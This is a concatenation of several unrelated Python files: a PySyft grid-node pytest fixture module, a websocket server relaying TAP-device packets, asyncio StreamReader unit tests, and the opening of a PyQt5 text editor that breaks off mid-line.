import pytest import torch from multiprocessing import Process import os import sys import syft from syft.grid.clients.dynamic_fl_client import DynamicFLClient from syft.grid.public_grid import PublicGridNetwork import gridnode from . import IDS, PORTS import time import requests import json from gevent import pywsgi from geventwebsocket.handler import WebSocketHandler @pytest.fixture() def start_proc(): # pragma: no cover """ helper function for spinning up a websocket participant """ def _start_proc(participant, kwargs): def target(): server = participant(**kwargs) server.start() p = Process(target=target) p.start() return p return _start_proc @pytest.fixture(scope="session", autouse=True) def node_infos(): return zip(IDS, PORTS) @pytest.fixture(scope="session", autouse=True) def init_nodes(node_infos): BASEDIR = os.path.dirname(os.path.dirname(__file__)) def setUpNode(port, node_id): from gridnode import create_app as ws_create_app app = ws_create_app(node_id, debug=False, database_url=None) server = pywsgi.WSGIServer(("", int(port)), app, handler_class=WebSocketHandler) server.serve_forever() jobs = [] # Init Grid Nodes for (node_id, port) in node_infos: p = Process(target=setUpNode, args=(port, node_id)) p.start() jobs.append(p) time.sleep(5) yield for job in jobs: job.terminate() def create_websocket_client(hook, port, id): node = DynamicFLClient(hook, "http://localhost:" + port + "/", id=id) return node @pytest.fixture(scope="function") def connected_node(hook): nodes = {} for (node_id, port) in zip(IDS, PORTS): node = create_websocket_client(hook, port, node_id) nodes[node_id] = node yield nodes for node in nodes: nodes[node].close() time.sleep(0.1) @pytest.fixture(scope="session", autouse=True) def hook(): hook = syft.TorchHook(torch) return hook
server.py
import asyncio import uvloop from module.devices import ServerVirtualDevice import threading import json asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) from autobahn.asyncio.websocket import WebSocketServerProtocol, \ WebSocketServerFactory class MyServerFactory(WebSocketServerFactory): def __init__(self): WebSocketServerFactory.__init__(self, "ws://127.0.0.1:9000") self.clients = set() self.virtual_device = ServerVirtualDevice() self.device = self.virtual_device.get_device() def listen_tap(self): while True: data = self.device.read(1500) print(data) self.broadcast(data, True) def register(self, client): if client not in self.clients: print("registered client {}".format(client.peer)) self.clients.add(client) def unregister(self, client): if client in self.clients: print("unregistered client {}".format(client.peer)) self.clients.remove(client) def broadcast(self, payload, isBinary): # if isBinary: # print("Binary message received: {0} bytes".format(len(payload))) # else: # print("Text message received: {0}".format(payload.decode('utf8'))) for c in self.clients: # c.sendMessage(msg.encode('utf8')) c.sendMessage(payload, isBinary) class MyServerProtocol(WebSocketServerProtocol): def onConnect(self, request): print("Client connecting: {0}".format(request.peer)) def onOpen(self): print("WebSocket connection open.") self.factory.register(self) print(self.factory.clients) def onMessage(self, payload, isBinary): if isBinary: print(payload) self.factory.device.write(payload) self.factory.broadcast(payload, isBinary) else: data = json.loads(payload.decode('utf8')) print("Text message received: {0}".format(payload.decode('utf8'))) def onClose(self, wasClean, code, reason): self.factory.unregister(self) print("WebSocket connection closed: {0}".format(reason)) if __name__ == '__main__': factory = MyServerFactory() factory.protocol = MyServerProtocol loop = asyncio.get_event_loop() coro = loop.create_server(factory, '0.0.0.0', 9000) server = loop.run_until_complete(coro) try: b = threading.Thread(name='background', target=factory.listen_tap) b.start() loop.run_forever() except KeyboardInterrupt: pass finally: server.close() loop.close()
test_streams.py
"""Tests for streams.py.""" import gc import os import queue import socket import sys import threading import unittest from unittest import mock try: import ssl except ImportError: ssl = None import asyncio from asyncio import test_utils class StreamReaderTests(test_utils.TestCase): DATA = b'line1\nline2\nline3\n' def setUp(self): self.loop = asyncio.new_event_loop() self.set_event_loop(self.loop) def tearDown(self): # just in case if we have transport close callbacks test_utils.run_briefly(self.loop) self.loop.close() gc.collect() super().tearDown() @mock.patch('asyncio.streams.events') def test_ctor_global_loop(self, m_events): stream = asyncio.StreamReader() self.assertIs(stream._loop, m_events.get_event_loop.return_value) def _basetest_open_connection(self, open_connection_fut): reader, writer = self.loop.run_until_complete(open_connection_fut) writer.write(b'GET / HTTP/1.0\r\n\r\n') f = reader.readline() data = self.loop.run_until_complete(f) self.assertEqual(data, b'HTTP/1.0 200 OK\r\n') f = reader.read() data = self.loop.run_until_complete(f) self.assertTrue(data.endswith(b'\r\n\r\nTest message')) writer.close() def test_open_connection(self): with test_utils.run_test_server() as httpd: conn_fut = asyncio.open_connection(*httpd.address, loop=self.loop) self._basetest_open_connection(conn_fut) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets') def test_open_unix_connection(self): with test_utils.run_test_unix_server() as httpd: conn_fut = asyncio.open_unix_connection(httpd.address, loop=self.loop) self._basetest_open_connection(conn_fut) def _basetest_open_connection_no_loop_ssl(self, open_connection_fut): try: reader, writer = self.loop.run_until_complete(open_connection_fut) finally: asyncio.set_event_loop(None) writer.write(b'GET / HTTP/1.0\r\n\r\n') f = reader.read() data = self.loop.run_until_complete(f) self.assertTrue(data.endswith(b'\r\n\r\nTest message')) writer.close() @unittest.skipIf(ssl is None, 'No ssl module') def test_open_connection_no_loop_ssl(self): with test_utils.run_test_server(use_ssl=True) as httpd: conn_fut = asyncio.open_connection( *httpd.address, ssl=test_utils.dummy_ssl_context(), loop=self.loop) self._basetest_open_connection_no_loop_ssl(conn_fut) @unittest.skipIf(ssl is None, 'No ssl module') @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets') def test_open_unix_connection_no_loop_ssl(self): with test_utils.run_test_unix_server(use_ssl=True) as httpd: conn_fut = asyncio.open_unix_connection( httpd.address, ssl=test_utils.dummy_ssl_context(), server_hostname='', loop=self.loop) self._basetest_open_connection_no_loop_ssl(conn_fut) def _basetest_open_connection_error(self, open_connection_fut): reader, writer = self.loop.run_until_complete(open_connection_fut) writer._protocol.connection_lost(ZeroDivisionError()) f = reader.read() with self.assertRaises(ZeroDivisionError): self.loop.run_until_complete(f) writer.close() test_utils.run_briefly(self.loop) def test_open_connection_error(self): with test_utils.run_test_server() as httpd: conn_fut = asyncio.open_connection(*httpd.address, loop=self.loop) self._basetest_open_connection_error(conn_fut) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets') def test_open_unix_connection_error(self): with test_utils.run_test_unix_server() as httpd: conn_fut = asyncio.open_unix_connection(httpd.address, loop=self.loop) self._basetest_open_connection_error(conn_fut) def test_feed_empty_data(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'') self.assertEqual(b'', stream._buffer) def test_feed_nonempty_data(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(self.DATA) self.assertEqual(self.DATA, stream._buffer) def test_read_zero(self): # Read zero bytes. stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(self.DATA) data = self.loop.run_until_complete(stream.read(0)) self.assertEqual(b'', data) self.assertEqual(self.DATA, stream._buffer) def test_read(self): # Read bytes. stream = asyncio.StreamReader(loop=self.loop) read_task = asyncio.Task(stream.read(30), loop=self.loop) def cb(): stream.feed_data(self.DATA) self.loop.call_soon(cb) data = self.loop.run_until_complete(read_task) self.assertEqual(self.DATA, data) self.assertEqual(b'', stream._buffer) def test_read_line_breaks(self): # Read bytes without line breaks. stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'line1') stream.feed_data(b'line2') data = self.loop.run_until_complete(stream.read(5)) self.assertEqual(b'line1', data) self.assertEqual(b'line2', stream._buffer) def test_read_eof(self): # Read bytes, stop at eof. stream = asyncio.StreamReader(loop=self.loop) read_task = asyncio.Task(stream.read(1024), loop=self.loop) def cb(): stream.feed_eof() self.loop.call_soon(cb) data = self.loop.run_until_complete(read_task) self.assertEqual(b'', data) self.assertEqual(b'', stream._buffer) def test_read_until_eof(self): # Read all bytes until eof. stream = asyncio.StreamReader(loop=self.loop) read_task = asyncio.Task(stream.read(-1), loop=self.loop) def cb(): stream.feed_data(b'chunk1\n') stream.feed_data(b'chunk2') stream.feed_eof() self.loop.call_soon(cb) data = self.loop.run_until_complete(read_task) self.assertEqual(b'chunk1\nchunk2', data) self.assertEqual(b'', stream._buffer) def test_read_exception(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'line\n') data = self.loop.run_until_complete(stream.read(2)) self.assertEqual(b'li', data) stream.set_exception(ValueError()) self.assertRaises( ValueError, self.loop.run_until_complete, stream.read(2)) def test_invalid_limit(self): with self.assertRaisesRegex(ValueError, 'imit'): asyncio.StreamReader(limit=0, loop=self.loop) with self.assertRaisesRegex(ValueError, 'imit'): asyncio.StreamReader(limit=-1, loop=self.loop) def test_read_limit(self): stream = asyncio.StreamReader(limit=3, loop=self.loop) stream.feed_data(b'chunk') data = self.loop.run_until_complete(stream.read(5)) self.assertEqual(b'chunk', data) self.assertEqual(b'', stream._buffer) def test_readline(self): # Read one line. 'readline' will need to wait for the data # to come from 'cb' stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'chunk1 ') read_task = asyncio.Task(stream.readline(), loop=self.loop) def cb(): stream.feed_data(b'chunk2 ') stream.feed_data(b'chunk3 ') stream.feed_data(b'\n chunk4') self.loop.call_soon(cb) line = self.loop.run_until_complete(read_task) self.assertEqual(b'chunk1 chunk2 chunk3 \n', line) self.assertEqual(b' chunk4', stream._buffer) def test_readline_limit_with_existing_data(self): # Read one line. The data is in StreamReader's buffer # before the event loop is run. stream = asyncio.StreamReader(limit=3, loop=self.loop) stream.feed_data(b'li') stream.feed_data(b'ne1\nline2\n') self.assertRaises( ValueError, self.loop.run_until_complete, stream.readline()) # The buffer should contain the remaining data after exception self.assertEqual(b'line2\n', stream._buffer) stream = asyncio.StreamReader(limit=3, loop=self.loop) stream.feed_data(b'li') stream.feed_data(b'ne1') stream.feed_data(b'li') self.assertRaises( ValueError, self.loop.run_until_complete, stream.readline()) # No b'\n' at the end. The 'limit' is set to 3. So before # waiting for the new data in buffer, 'readline' will consume # the entire buffer, and since the length of the consumed data # is more than 3, it will raise a ValueError. The buffer is # expected to be empty now. self.assertEqual(b'', stream._buffer) def test_at_eof(self): stream = asyncio.StreamReader(loop=self.loop) self.assertFalse(stream.at_eof()) stream.feed_data(b'some data\n') self.assertFalse(stream.at_eof()) self.loop.run_until_complete(stream.readline()) self.assertFalse(stream.at_eof()) stream.feed_data(b'some data\n') stream.feed_eof() self.loop.run_until_complete(stream.readline()) self.assertTrue(stream.at_eof()) def test_readline_limit(self): # Read one line. StreamReaders are fed with data after # their 'readline' methods are called. stream = asyncio.StreamReader(limit=7, loop=self.loop) def cb(): stream.feed_data(b'chunk1') stream.feed_data(b'chunk2') stream.feed_data(b'chunk3\n') stream.feed_eof() self.loop.call_soon(cb) self.assertRaises( ValueError, self.loop.run_until_complete, stream.readline()) # The buffer had just one line of data, and after raising # a ValueError it should be empty. self.assertEqual(b'', stream._buffer) stream = asyncio.StreamReader(limit=7, loop=self.loop) def cb(): stream.feed_data(b'chunk1') stream.feed_data(b'chunk2\n') stream.feed_data(b'chunk3\n') stream.feed_eof() self.loop.call_soon(cb) self.assertRaises( ValueError, self.loop.run_until_complete, stream.readline()) self.assertEqual(b'chunk3\n', stream._buffer) # check strictness of the limit stream = asyncio.StreamReader(limit=7, loop=self.loop) stream.feed_data(b'1234567\n') line = self.loop.run_until_complete(stream.readline()) self.assertEqual(b'1234567\n', line) self.assertEqual(b'', stream._buffer) stream.feed_data(b'12345678\n') with self.assertRaises(ValueError) as cm: self.loop.run_until_complete(stream.readline()) self.assertEqual(b'', stream._buffer) stream.feed_data(b'12345678') with self.assertRaises(ValueError) as cm: self.loop.run_until_complete(stream.readline()) self.assertEqual(b'', stream._buffer) def test_readline_nolimit_nowait(self): # All needed data for the first 'readline' call will be # in the buffer. stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(self.DATA[:6]) stream.feed_data(self.DATA[6:]) line = self.loop.run_until_complete(stream.readline()) self.assertEqual(b'line1\n', line) self.assertEqual(b'line2\nline3\n', stream._buffer) def test_readline_eof(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'some data') stream.feed_eof() line = self.loop.run_until_complete(stream.readline()) self.assertEqual(b'some data', line) def test_readline_empty_eof(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_eof() line = self.loop.run_until_complete(stream.readline()) self.assertEqual(b'', line) def test_readline_read_byte_count(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(self.DATA) self.loop.run_until_complete(stream.readline()) data = self.loop.run_until_complete(stream.read(7)) self.assertEqual(b'line2\nl', data) self.assertEqual(b'ine3\n', stream._buffer) def test_readline_exception(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'line\n') data = self.loop.run_until_complete(stream.readline()) self.assertEqual(b'line\n', data) stream.set_exception(ValueError()) self.assertRaises( ValueError, self.loop.run_until_complete, stream.readline()) self.assertEqual(b'', stream._buffer) def test_readuntil_separator(self): stream = asyncio.StreamReader(loop=self.loop) with self.assertRaisesRegex(ValueError, 'Separator should be'): self.loop.run_until_complete(stream.readuntil(separator=b'')) def test_readuntil_multi_chunks(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'lineAAA') data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA')) self.assertEqual(b'lineAAA', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'lineAAA') data = self.loop.run_until_complete(stream.readuntil(b'AAA')) self.assertEqual(b'lineAAA', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'lineAAAxxx') data = self.loop.run_until_complete(stream.readuntil(b'AAA')) self.assertEqual(b'lineAAA', data) self.assertEqual(b'xxx', stream._buffer) def test_readuntil_multi_chunks_1(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'QWEaa') stream.feed_data(b'XYaa') stream.feed_data(b'a') data = self.loop.run_until_complete(stream.readuntil(b'aaa')) self.assertEqual(b'QWEaaXYaaa', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'QWEaa') stream.feed_data(b'XYa') stream.feed_data(b'aa') data = self.loop.run_until_complete(stream.readuntil(b'aaa')) self.assertEqual(b'QWEaaXYaaa', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'aaa') data = self.loop.run_until_complete(stream.readuntil(b'aaa')) self.assertEqual(b'aaa', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'Xaaa') data = self.loop.run_until_complete(stream.readuntil(b'aaa')) self.assertEqual(b'Xaaa', data) self.assertEqual(b'', stream._buffer) stream.feed_data(b'XXX') stream.feed_data(b'a') stream.feed_data(b'a') stream.feed_data(b'a') data = self.loop.run_until_complete(stream.readuntil(b'aaa')) self.assertEqual(b'XXXaaa', data) self.assertEqual(b'', stream._buffer) def test_readuntil_eof(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'some dataAA') stream.feed_eof() with self.assertRaises(asyncio.IncompleteReadError) as cm: self.loop.run_until_complete(stream.readuntil(b'AAA')) self.assertEqual(cm.exception.partial, b'some dataAA') self.assertIsNone(cm.exception.expected) self.assertEqual(b'', stream._buffer) def test_readuntil_limit_found_sep(self): stream = asyncio.StreamReader(loop=self.loop, limit=3) stream.feed_data(b'some dataAA') with self.assertRaisesRegex(asyncio.LimitOverrunError, 'not found') as cm: self.loop.run_until_complete(stream.readuntil(b'AAA')) self.assertEqual(b'some dataAA', stream._buffer) stream.feed_data(b'A') with self.assertRaisesRegex(asyncio.LimitOverrunError, 'is found') as cm: self.loop.run_until_complete(stream.readuntil(b'AAA')) self.assertEqual(b'some dataAAA', stream._buffer) def test_readexactly_zero_or_less(self): # Read exact number of bytes (zero or less). stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(self.DATA) data = self.loop.run_until_complete(stream.readexactly(0)) self.assertEqual(b'', data) self.assertEqual(self.DATA, stream._buffer) with self.assertRaisesRegex(ValueError, 'less than zero'): self.loop.run_until_complete(stream.readexactly(-1)) self.assertEqual(self.DATA, stream._buffer) def test_readexactly(self): # Read exact number of bytes. stream = asyncio.StreamReader(loop=self.loop) n = 2 * len(self.DATA) read_task = asyncio.Task(stream.readexactly(n), loop=self.loop) def cb(): stream.feed_data(self.DATA) stream.feed_data(self.DATA) stream.feed_data(self.DATA) self.loop.call_soon(cb) data = self.loop.run_until_complete(read_task) self.assertEqual(self.DATA + self.DATA, data) self.assertEqual(self.DATA, stream._buffer) def test_readexactly_limit(self): stream = asyncio.StreamReader(limit=3, loop=self.loop) stream.feed_data(b'chunk') data = self.loop.run_until_complete(stream.readexactly(5)) self.assertEqual(b'chunk', data) self.assertEqual(b'', stream._buffer) def test_readexactly_eof(self): # Read exact number of bytes (eof). stream = asyncio.StreamReader(loop=self.loop) n = 2 * len(self.DATA) read_task = asyncio.Task(stream.readexactly(n), loop=self.loop) def cb(): stream.feed_data(self.DATA) stream.feed_eof() self.loop.call_soon(cb) with self.assertRaises(asyncio.IncompleteReadError) as cm: self.loop.run_until_complete(read_task) self.assertEqual(cm.exception.partial, self.DATA) self.assertEqual(cm.exception.expected, n) self.assertEqual(str(cm.exception), '18 bytes read on a total of 36 expected bytes') self.assertEqual(b'', stream._buffer) def test_readexactly_exception(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'line\n') data = self.loop.run_until_complete(stream.readexactly(2)) self.assertEqual(b'li', data) stream.set_exception(ValueError()) self.assertRaises( ValueError, self.loop.run_until_complete, stream.readexactly(2)) def test_exception(self): stream = asyncio.StreamReader(loop=self.loop) self.assertIsNone(stream.exception()) exc = ValueError() stream.set_exception(exc) self.assertIs(stream.exception(), exc) def test_exception_waiter(self): stream = asyncio.StreamReader(loop=self.loop) @asyncio.coroutine def set_err(): stream.set_exception(ValueError()) t1 = asyncio.Task(stream.readline(), loop=self.loop) t2 = asyncio.Task(set_err(), loop=self.loop) self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop)) self.assertRaises(ValueError, t1.result) def test_exception_cancel(self): stream = asyncio.StreamReader(loop=self.loop) t = asyncio.Task(stream.readline(), loop=self.loop) test_utils.run_briefly(self.loop) t.cancel() test_utils.run_briefly(self.loop) # The following line fails if set_exception() isn't careful. stream.set_exception(RuntimeError('message')) test_utils.run_briefly(self.loop) self.assertIs(stream._waiter, None) def test_start_server(self): class MyServer: def __init__(self, loop): self.server = None self.loop = loop @asyncio.coroutine def handle_client(self, client_reader, client_writer): data = yield from client_reader.readline() client_writer.write(data) yield from client_writer.drain() client_writer.close() def start(self): sock = socket.socket() sock.bind(('127.0.0.1', 0)) self.server = self.loop.run_until_complete( asyncio.start_server(self.handle_client, sock=sock, loop=self.loop)) return sock.getsockname() def handle_client_callback(self, client_reader, client_writer): self.loop.create_task(self.handle_client(client_reader, client_writer)) def start_callback(self): sock = socket.socket() sock.bind(('127.0.0.1', 0)) addr = sock.getsockname() sock.close() self.server = self.loop.run_until_complete( asyncio.start_server(self.handle_client_callback, host=addr[0], port=addr[1], loop=self.loop)) return addr def stop(self): if self.server is not None: self.server.close() self.loop.run_until_complete(self.server.wait_closed()) self.server = None @asyncio.coroutine def client(addr): reader, writer = yield from asyncio.open_connection( *addr, loop=self.loop) # send a line writer.write(b"hello world!\n") # read it back msgback = yield from reader.readline() writer.close() return msgback # test the server variant with a coroutine as client handler server = MyServer(self.loop) addr = server.start() msg = self.loop.run_until_complete(asyncio.Task(client(addr), loop=self.loop)) server.stop() self.assertEqual(msg, b"hello world!\n") # test the server variant with a callback as client handler server = MyServer(self.loop) addr = server.start_callback() msg = self.loop.run_until_complete(asyncio.Task(client(addr), loop=self.loop)) server.stop() self.assertEqual(msg, b"hello world!\n") @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets') def test_start_unix_server(self): class MyServer: def __init__(self, loop, path): self.server = None self.loop = loop self.path = path @asyncio.coroutine def handle_client(self, client_reader, client_writer): data = yield from client_reader.readline() client_writer.write(data) yield from client_writer.drain() client_writer.close() def start(self): self.server = self.loop.run_until_complete( asyncio.start_unix_server(self.handle_client, path=self.path, loop=self.loop)) def handle_client_callback(self, client_reader, client_writer): self.loop.create_task(self.handle_client(client_reader, client_writer)) def start_callback(self): start = asyncio.start_unix_server(self.handle_client_callback, path=self.path, loop=self.loop) self.server = self.loop.run_until_complete(start) def stop(self): if self.server is not None: self.server.close() self.loop.run_until_complete(self.server.wait_closed()) self.server = None @asyncio.coroutine def client(path): reader, writer = yield from asyncio.open_unix_connection( path, loop=self.loop) # send a line writer.write(b"hello world!\n") # read it back msgback = yield from reader.readline() writer.close() return msgback # test the server variant with a coroutine as client handler with test_utils.unix_socket_path() as path: server = MyServer(self.loop, path) server.start() msg = self.loop.run_until_complete(asyncio.Task(client(path), loop=self.loop)) server.stop() self.assertEqual(msg, b"hello world!\n") # test the server variant with a callback as client handler with test_utils.unix_socket_path() as path: server = MyServer(self.loop, path) server.start_callback() msg = self.loop.run_until_complete(asyncio.Task(client(path), loop=self.loop)) server.stop() self.assertEqual(msg, b"hello world!\n") @unittest.skipIf(sys.platform == 'win32', "Don't have pipes") def test_read_all_from_pipe_reader(self): # See asyncio issue 168. This test is derived from the example # subprocess_attach_read_pipe.py, but we configure the # StreamReader's limit so that twice it is less than the size # of the data writter. Also we must explicitly attach a child # watcher to the event loop. code = """\ import os, sys fd = int(sys.argv[1]) os.write(fd, b'data') os.close(fd) """ rfd, wfd = os.pipe() args = [sys.executable, '-c', code, str(wfd)] pipe = open(rfd, 'rb', 0) reader = asyncio.StreamReader(loop=self.loop, limit=1) protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop) transport, _ = self.loop.run_until_complete( self.loop.connect_read_pipe(lambda: protocol, pipe)) watcher = asyncio.SafeChildWatcher() watcher.attach_loop(self.loop) try: asyncio.set_child_watcher(watcher) create = asyncio.create_subprocess_exec(*args, pass_fds={wfd}, loop=self.loop) proc = self.loop.run_until_complete(create) self.loop.run_until_complete(proc.wait()) finally: asyncio.set_child_watcher(None) os.close(wfd) data = self.loop.run_until_complete(reader.read(-1)) self.assertEqual(data, b'data') def test_streamreader_constructor(self): self.addCleanup(asyncio.set_event_loop, None) asyncio.set_event_loop(self.loop) # asyncio issue #184: Ensure that StreamReaderProtocol constructor # retrieves the current loop if the loop parameter is not set reader = asyncio.StreamReader() self.assertIs(reader._loop, self.loop) def test_streamreaderprotocol_constructor(self): self.addCleanup(asyncio.set_event_loop, None) asyncio.set_event_loop(self.loop) # asyncio issue #184: Ensure that StreamReaderProtocol constructor # retrieves the current loop if the loop parameter is not set reader = mock.Mock() protocol = asyncio.StreamReaderProtocol(reader) self.assertIs(protocol._loop, self.loop) def test_drain_raises(self): # See http://bugs.python.org/issue25441 # This test should not use asyncio for the mock server; the # whole point of the test is to test for a bug in drain() # where it never gives up the event loop but the socket is # closed on the server side. q = queue.Queue() def server(): # Runs in a separate thread. sock = socket.socket() with sock: sock.bind(('localhost', 0)) sock.listen(1) addr = sock.getsockname() q.put(addr) clt, _ = sock.accept() clt.close() @asyncio.coroutine def client(host, port): reader, writer = yield from asyncio.open_connection( host, port, loop=self.loop) while True: writer.write(b"foo\n") yield from writer.drain() # Start the server thread and wait for it to be listening. thread = threading.Thread(target=server) thread.setDaemon(True) thread.start() addr = q.get() # Should not be stuck in an infinite loop. with self.assertRaises((ConnectionResetError, BrokenPipeError)): self.loop.run_until_complete(client(*addr)) # Clean up the thread. (Only on success; on failure, it may # be stuck in accept().) thread.join() def test___repr__(self): stream = asyncio.StreamReader(loop=self.loop) self.assertEqual("<StreamReader>", repr(stream)) def test___repr__nondefault_limit(self): stream = asyncio.StreamReader(loop=self.loop, limit=123) self.assertEqual("<StreamReader l=123>", repr(stream)) def test___repr__eof(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_eof() self.assertEqual("<StreamReader eof>", repr(stream)) def test___repr__data(self): stream = asyncio.StreamReader(loop=self.loop) stream.feed_data(b'data') self.assertEqual("<StreamReader 4 bytes>", repr(stream)) def test___repr__exception(self): stream = asyncio.StreamReader(loop=self.loop) exc = RuntimeError() stream.set_exception(exc) self.assertEqual("<StreamReader e=RuntimeError()>", repr(stream)) def test___repr__waiter(self): stream = asyncio.StreamReader(loop=self.loop) stream._waiter = asyncio.Future(loop=self.loop) self.assertRegex( repr(stream), "<StreamReader w=<Future pending[\S ]*>>") stream._waiter.set_result(None) self.loop.run_until_complete(stream._waiter) stream._waiter = None self.assertEqual("<StreamReader>", repr(stream)) def test___repr__transport(self): stream = asyncio.StreamReader(loop=self.loop) stream._transport = mock.Mock() stream._transport.__repr__ = mock.Mock() stream._transport.__repr__.return_value = "<Transport>" self.assertEqual("<StreamReader t=<Transport>>", repr(stream)) if __name__ == '__main__': unittest.main()
dte_main.py
# -*- coding: utf-8 -*- import sys import threading #PYQT5 PyQt4’s QtGui module has been split into PyQt5’s QtGui, QtPrintSupport and QtWidgets modules from check_connectivity import is_connected from event_updater import * from dte_encryption import * from bs4 import BeautifulSoup from PyQt5 import QtWidgets #PYQT5 QMainWindow, QApplication, QAction, QFontComboBox, QSpinBox, QTextEdit, QMessageBox #PYQT5 QFileDialog, QColorDialog, QDialog from PyQt5 import QtPrintSupport #PYQT5 QPrintPreviewDialog, QPrintDialog from PyQt5 import QtGui, QtCore from PyQt5.QtCore import Qt from ext import * class Main(QtWidgets.QMainWindow): def __init__(self,parent=None): QtWidgets.QMainWindow.__init__(self,parent) self.filename = "" self.fileid = "" self.changesSaved = True self.initUI() def initToolbar(self): self.newAction = QtWidgets.QAction(QtGui.QIcon("icons/new.png"),"New",self) self.newAction.setShortcut("Ctrl+N") self.newAction.setStatusTip("Create a new document from scratch.") self.newAction.triggered.connect(self.new) self.openAction = QtWidgets.QAction(QtGui.QIcon("icons/open.png"),"Open file",self) self.openAction.setStatusTip("Open existing document") self.openAction.setShortcut("Ctrl+O") self.openAction.triggered.connect(self.open) self.saveAction = QtWidgets.QAction(QtGui.QIcon("icons/save.png"),"Save",self) self.saveAction.setStatusTip("Save document") self.saveAction.setShortcut("Ctrl+S") self.saveAction.triggered.connect(self.save) self.printAction = QtWidgets.QAction(QtGui.QIcon("icons/print.png"),"Print document",self) self.printAction.setStatusTip("Print document") self.printAction.setShortcut("Ctrl+P") self.printAction.triggered.connect(self.printHandler) self.previewAction = QtWidgets.QAction(QtGui.QIcon("icons/preview.png"),"Page view",self) self.previewAction.setStatusTip("Preview page before printing") self.previewAction.setShortcut("Ctrl+Shift+P") self.previewAction.triggered.connect(self.preview) self.findAction = QtWidgets.QAction(QtGui.QIcon("icons/find.png"),"Find and replace",self) self.findAction.setStatusTip("Find and replace words in your document") self.findAction.setShortcut("Ctrl+F") self.findAction.triggered.connect(find.Find(self).show) self.cutAction = QtWidgets.QAction(QtGui.QIcon("icons/cut.png"),"Cut to clipboard",self) self.cutAction.setStatusTip("Delete and copy text to clipboard") self.cutAction.setShortcut("Ctrl+X") self.cutAction.triggered.connect(self.text.cut) self.copyAction = QtWidgets.QAction(QtGui.QIcon("icons/copy.png"),"Copy to clipboard",self) self.copyAction.setStatusTip("Copy text to clipboard") self.copyAction.setShortcut("Ctrl+C") self.copyAction.triggered.connect(self.text.copy) self.pasteAction = QtWidgets.QAction(QtGui.QIcon("icons/paste.png"),"Paste from clipboard",self) self.pasteAction.setStatusTip("Paste text from clipboard") self.pasteAction.setShortcut("Ctrl+V") self.pasteAction.triggered.connect(self.text.paste) self.undoAction = QtWidgets.QAction(QtGui.QIcon("icons/undo.png"),"Undo last action",self) self.undoAction.setStatusTip("Undo last action") self.undoAction.setShortcut("Ctrl+Z") self.undoAction.triggered.connect(self.text.undo) self.redoAction = QtWidgets.QAction(QtGui.QIcon("icons/redo.png"),"Redo last undone thing",self) self.redoAction.setStatusTip("Redo last undone thing") self.redoAction.setShortcut("Ctrl+Y") self.redoAction.triggered.connect(self.text.redo) dateTimeAction = QtWidgets.QAction(QtGui.QIcon("icons/calender.png"),"Insert current date/time",self) dateTimeAction.setStatusTip("Insert current date/time") dateTimeAction.setShortcut("Ctrl+D") dateTimeAction.triggered.connect(datetime.DateTime(self).show) wordCountAction = QtWidgets.QAction(QtGui.QIcon("icons/count.png"),"See word/symbol count",self) wordCountAction.setStatusTip("See word/symbol count") wordCountAction.setShortcut("Ctrl+W") wordCountAction.triggered.connect(self.wordCount) tableAction = QtWidgets.QAction(QtGui.QIcon("icons/table.png"),"Insert table",self) tableAction.setStatusTip("Insert table") tableAction.setShortcut("Ctrl+T") tableAction.triggered.connect(table.Table(self).show) imageAction = QtWidgets.QAction(QtGui.QIcon("icons/image.png"),"Insert image",self) imageAction.setStatusTip("Insert image") imageAction.setShortcut("Ctrl+Shift+I") imageAction.triggered.connect(self.insertImage) bulletAction = QtWidgets.QAction(QtGui.QIcon("icons/bullet.png"),"Insert bullet List",self) bulletAction.setStatusTip("Insert bullet list") bulletAction.setShortcut("Ctrl+Shift+B") bulletAction.triggered.connect(self.bulletList) numberedAction = QtWidgets.QAction(QtGui.QIcon("icons/number.png"),"Insert numbered List",self) numberedAction.setStatusTip("Insert numbered list") numberedAction.setShortcut("Ctrl+Shift+L") numberedAction.triggered.connect(self.numberList) self.toolbar = self.addToolBar("Options") self.toolbar.addAction(self.newAction) self.toolbar.addAction(self.openAction) self.toolbar.addAction(self.saveAction) self.toolbar.addSeparator() self.toolbar.addAction(self.printAction) self.toolbar.addAction(self.previewAction) self.toolbar.addSeparator() self.toolbar.addAction(self.cutAction) self.toolbar.addAction(self.copyAction) self.toolbar.addAction(self.pasteAction) self.toolbar.addAction(self.undoAction) self.toolbar.addAction(self.redoAction) self.toolbar.addSeparator() self.toolbar.addAction(self.findAction) self.toolbar.addAction(dateTimeAction) self.toolbar.addAction(wordCountAction) self.toolbar.addAction(tableAction) self.toolbar.addAction(imageAction) self.toolbar.addSeparator() self.toolbar.addAction(bulletAction) self.toolbar.addAction(numberedAction) self.addToolBarBreak() def initFormatbar(self): fontBox = QtWidgets.QFontComboBox(self) fontBox.currentFontChanged.connect(lambda font: self.text.setCurrentFont(font)) fontSize = QtWidgets.QSpinBox(self) # Will display " pt" after each value fontSize.setSuffix(" 